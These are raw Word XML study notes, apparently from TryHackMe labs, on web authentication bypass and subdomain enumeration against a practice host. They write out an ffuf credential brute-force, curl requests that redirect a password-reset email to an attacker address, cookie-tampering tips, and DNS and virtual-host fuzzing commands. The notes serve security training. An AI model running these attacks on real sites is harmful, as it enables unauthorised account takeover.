        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="008C0DA9">
        <w:t xml:space="preserve">ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&amp;password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId260" w:history="1">
        <w:r w:rsidRPr="009D55D8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://MACHINE_IP/customers/login -fc 200</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="23C63B02" w14:textId="1488BA95" w:rsidR="008C0DA9" w:rsidRDefault="008C0DA9" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>W1 – usernames list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6A9735" w14:textId="3453CCA6" w:rsidR="008C0DA9" w:rsidRDefault="008C0DA9" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>W2 – passwords list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDEC6C9" w14:textId="0659C84C" w:rsidR="008C0DA9" w:rsidRDefault="008C0DA9" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-w – wordlists specified by this, but separated by a comma</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D65CAA0" w14:textId="6492D3B4" w:rsidR="008C0DA9" w:rsidRDefault="008C0DA9" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-fc – check for HTTP status code other than 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD08F22" w14:textId="57499D8B" w:rsidR="008C0DA9" w:rsidRDefault="008C0DA9" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Logic Flaw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2DCC2A" w14:textId="240C66E5" w:rsidR="008C0DA9" w:rsidRDefault="008C0DA9" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>typical logic path of an application is either bypassed, circumvented, or manipulated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD41DC3" w14:textId="27CCDB08" w:rsidR="00D66F89" w:rsidRDefault="00D66F89" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D66F89">
        <w:t>curl 'http://MACHINE_IP/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FB924D" w14:textId="7C81CD53" w:rsidR="00D66F89" w:rsidRDefault="00D66F89" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>when resetting a password, the user account is retrieved using the query string, but the password reset email is itself sent using the data found in the PHP variable $_REQUEST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAEE53C" w14:textId="1F2E2A92" w:rsidR="00D66F89" w:rsidRDefault="00D66F89" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>this variable contains data received from the query string and POST data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4923E50D" w14:textId="4106E60B" w:rsidR="00D66F89" w:rsidRDefault="00D66F89" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>if the same key name is used for both the query string and POST data, the application logic for this variable favors POST data fields over the query string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B41ACC" w14:textId="4736474E" w:rsidR="00D66F89" w:rsidRDefault="00D66F89" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>by adding another parameter to the POST form, attacker can control where the password reset email gets delivered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085A4704" w14:textId="1EC4B734" w:rsidR="00D66F89" w:rsidRDefault="00D66F89" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D66F89">
        <w:t>curl 'http://MACHINE_IP/customers/reset email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&amp;email=attacker@hacker.com'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB4F6E4" w14:textId="5BAC85A0" w:rsidR="00D66F89" w:rsidRDefault="00D66F89" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Cookie Tampering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048F2E7C" w14:textId="31D145CB" w:rsidR="00D66F89" w:rsidRDefault="00D66F89" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Examining and editing cookies set by web server during an online session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446F3B9C" w14:textId="73D15999" w:rsidR="00D66F89" w:rsidRDefault="00D66F89" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>leads to unauthenticated access, access to another user account, or elevated privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41673706" w14:textId="6337F071" w:rsidR="00D66F89" w:rsidRDefault="007A6E65" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId261" w:history="1">
        <w:r w:rsidR="00D66F89" w:rsidRPr="009D55D8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://tryhackme.com/room/httpindetail</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3F6A7A6D" w14:textId="06D3BDFB" w:rsidR="00D66F89" w:rsidRDefault="00D66F89" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sometimes cookies are in plaintext, making it obvious what they do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289B7272" w14:textId="168AA81C" w:rsidR="00D66F89" w:rsidRDefault="00D66F89" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Set-Cookie: logged_in=true; Max-Age=3600; Path=/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042BF76A" w14:textId="60600A45" w:rsidR="00D66F89" w:rsidRDefault="00D66F89" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Set-Cookie: admin=false; Max-Age=3600; Path=/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F76D993" w14:textId="5437F991" w:rsidR="00D66F89" w:rsidRDefault="00D66F89" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sometimes cookies are hashed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026E1D86" w14:textId="6EA7CF3E" w:rsidR="00D66F89" w:rsidRDefault="00D66F89" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>crackstation to reverse and understand what is being used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C66EF7" w14:textId="37DB56E1" w:rsidR="00D66F89" w:rsidRDefault="00D66F89" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>sometimes cookies are encoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A0CDC7" w14:textId="3ECD17AF" w:rsidR="00D66F89" w:rsidRDefault="00D66F89" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>base64, base32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D125F80" w14:textId="3475053D" w:rsidR="00D66F89" w:rsidRDefault="00D66F89" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>decoding values to understand what must be manipulated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0856C749" w14:textId="122EAD7A" w:rsidR="00D66F89" w:rsidRDefault="00D66F89" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>encoding manipulated values to take advantage and bypass authentication measures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C1E090" w14:textId="405C687E" w:rsidR="000543F7" w:rsidRDefault="000543F7" w:rsidP="000543F7">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12990FF6" w14:textId="153192BC" w:rsidR="000543F7" w:rsidRDefault="00BC1C6D" w:rsidP="000543F7">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Subdomain Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D7025A" w14:textId="706EBD67" w:rsidR="00BC1C6D" w:rsidRDefault="00BC1C6D" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Brief</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6364FD92" w14:textId="125E4DF1" w:rsidR="00BC1C6D" w:rsidRDefault="00BC1C6D" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Brute Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E0E36D" w14:textId="4209E74A" w:rsidR="00BC1C6D" w:rsidRDefault="00BC1C6D" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>OSINT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FAE5EA" w14:textId="06111282" w:rsidR="00BC1C6D" w:rsidRDefault="00BC1C6D" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Virtual Host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FFBCF9" w14:textId="64A6D3DC" w:rsidR="00BC1C6D" w:rsidRDefault="00BC1C6D" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>OSINT – SSL/TLS Certificates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1A7CA8" w14:textId="7000A3C7" w:rsidR="00BC1C6D" w:rsidRDefault="00BC1C6D" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CA’s published Certificate Transparency logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6397F69D" w14:textId="2088C663" w:rsidR="00BC1C6D" w:rsidRDefault="00BC1C6D" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>publicly accessible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2F91F7" w14:textId="3C1AEB97" w:rsidR="00BC1C6D" w:rsidRDefault="007A6E65" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId262" w:history="1">
        <w:r w:rsidR="00BC1C6D" w:rsidRPr="00DD786A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://crt.sh/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="37E838F6" w14:textId="1CA3DE43" w:rsidR="00BC1C6D" w:rsidRDefault="007A6E65" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId263" w:history="1">
        <w:r w:rsidR="00BC1C6D" w:rsidRPr="00DD786A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://transparencyreport.google.com/https/certificates</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="72236C0A" w14:textId="3EC47918" w:rsidR="00BC1C6D" w:rsidRDefault="00BC1C6D" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>OSINT – Search Engine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126668FC" w14:textId="2F8299DE" w:rsidR="00BC1C6D" w:rsidRDefault="00BC1C6D" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>site:filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4055A27B" w14:textId="5D5A6D71" w:rsidR="00BC1C6D" w:rsidRDefault="00BC1C6D" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>“-site:www.domain.com site:*.domain.com”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712565DC" w14:textId="6A725C48" w:rsidR="00BC1C6D" w:rsidRDefault="00BC1C6D" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>DNS – Bruteforce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259BBDE2" w14:textId="4678FD2A" w:rsidR="00BC1C6D" w:rsidRDefault="00BC1C6D" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Run DNSrecon Request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A951C69" w14:textId="2458225D" w:rsidR="00BC1C6D" w:rsidRDefault="00BC1C6D" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>dnsrecon -t brt -d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642B0055" w14:textId="412A1368" w:rsidR="00BC1C6D" w:rsidRDefault="00BC1C6D" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>OSINT – Sublist3r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063765E9" w14:textId="2E465409" w:rsidR="00BC1C6D" w:rsidRDefault="007A6E65" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId264" w:history="1">
        <w:r w:rsidR="00BC1C6D" w:rsidRPr="00DD786A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/aboul3la/Sublist3r</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="32C33B1E" w14:textId="28FF0DF4" w:rsidR="00BC1C6D" w:rsidRDefault="00BC1C6D" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>./sublist3r.py -d &lt;site&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC71ED5" w14:textId="3C1FB854" w:rsidR="00BC1C6D" w:rsidRDefault="00BC1C6D" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Virtual Host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EF40DD" w14:textId="1229AB34" w:rsidR="00BC1C6D" w:rsidRDefault="00BC1C6D" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>DNS recorded could be kept on a private DNS server or recorded on developers machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6399A109" w14:textId="5A97CCAF" w:rsidR="00BC1C6D" w:rsidRDefault="00BC1C6D" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>/etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C944273" w14:textId="1B18FADE" w:rsidR="00BC1C6D" w:rsidRDefault="00BC1C6D" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>c:\windows\system32\drivers\etc\hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285CDE48" w14:textId="689B4B3D" w:rsidR="00BC1C6D" w:rsidRDefault="00E55889" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>server knows which website the client wants from the Host header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A24F49" w14:textId="6ECEA5A5" w:rsidR="00E55889" w:rsidRDefault="00E55889" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00E55889">
        <w:t xml:space="preserve">ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId265" w:history="1">
        <w:r w:rsidRPr="00DD786A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://MACHINE_IP</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="555C3C26" w14:textId="397462A8" w:rsidR="00E55889" w:rsidRDefault="00E55889" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use -fs switch to cut out most recurring response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F99123" w14:textId="52D33C1C" w:rsidR="00E55889" w:rsidRDefault="00E55889" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-fs {size}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB5D6BE" w14:textId="259FAEDC" w:rsidR="00E55889" w:rsidRDefault="00E55889" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00E55889">
        <w:t>ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://MACHINE_IP -fs {size}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A03E451" w14:textId="12D66EED" w:rsidR="00E55889" w:rsidRDefault="00E55889" w:rsidP="00E55889">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EA58FF1" w14:textId="51107868" w:rsidR="00E55889" w:rsidRDefault="003C2DAA" w:rsidP="00E55889">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Passive Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE81C99" w14:textId="5AF1210F" w:rsidR="003C2DAA" w:rsidRDefault="003C2DAA" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8E23C6" w14:textId="27678D65" w:rsidR="003C2DAA" w:rsidRDefault="003C2DAA" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Passive versus Active Recon</w:t>
      </w:r>
    </w:p>
